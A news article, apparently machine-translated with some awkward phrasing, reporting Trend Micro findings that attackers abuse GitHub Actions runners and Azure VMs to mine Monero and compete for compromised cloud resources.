GitHub Actions and Azure virtual machines (VMs) are being used for cloud-based cryptocurrency mining, indicating ongoing efforts by malicious actors to target cloud resources for illicit purposes.
“Attackers can abuse the operators or servers provided by GitHub to run an organization’s pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to easily earn profit,” Trend Micro researcher said in a report last week , Magno Logan.
GitHub Actions (GHAs) is a continuous integration and continuous delivery (CI/CD) platform that allows users to automate the building, testing, and deployment of software. Developers can use the feature to create workflows that build and test each pull request in a code repository, or deploy merged pull requests to production.
Both Linux and Windows versions are hosted on Standard_DS2_v2 virtual machines in Azure and come with two vCPUs and 7GB of memory.
The Japanese company said it identified no less than 1,000 repositories and over 550 code samples that are taking advantage of the platform to mine cryptocurrency using smugglers provided by GitHub. Microsoft’s proprietary code hosting service has been notified of this issue.
Additionally, 11 repositories were found to hold similar variants of a YAML script containing commands to mine Monero coins, all of which were backed by the same wallet, suggesting it is the handiwork of a single actor or a group working together.
“As long as malicious actors only use their own accounts and repositories, end users should have no reason to worry,” Logan said. “Problems arise when these GHAs are shared on the GitHub Marketplace or used as a dependency for other Actions.”
Cryptojacking-oriented groups are known to penetrate cloud deployments by exploiting a security flaw within the target systems, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud implementation.
Some of the prominent players in the outlaw cryptocurrency mining landscape include 8220, Keksec (aka Kek Security), Kinsing, Outlaw, and TeamTNT.
The malware toolkit is also characterized by using kill scripts to terminate and wipe out competing cryptocurrency miners to best abuse cloud systems to their advantage, with Trend Micro calling it a battle “fought for control of resources of the victim”.
That said, cryptominer deployments, in addition to infrastructure and energy costs, are also a barometer of poor security hygiene, enabling threat actors to weaponize initial access gained through cloud misconfiguration for far more nefarious purposes. malware such as data exfiltration or ransomware.
“A unique aspect […] is that groups of malicious actors not only have to deal with a target organization’s security systems and staff, but they also have to compete with each other for limited resources,” the company noted in a report previous.
“The battle to gain and maintain control over victim servers is a major driving force for the evolution of these groups’ tools and techniques, driving them to continually improve their ability to remove competitors from compromised systems and, at the same time, time, to resist them. own removal”.
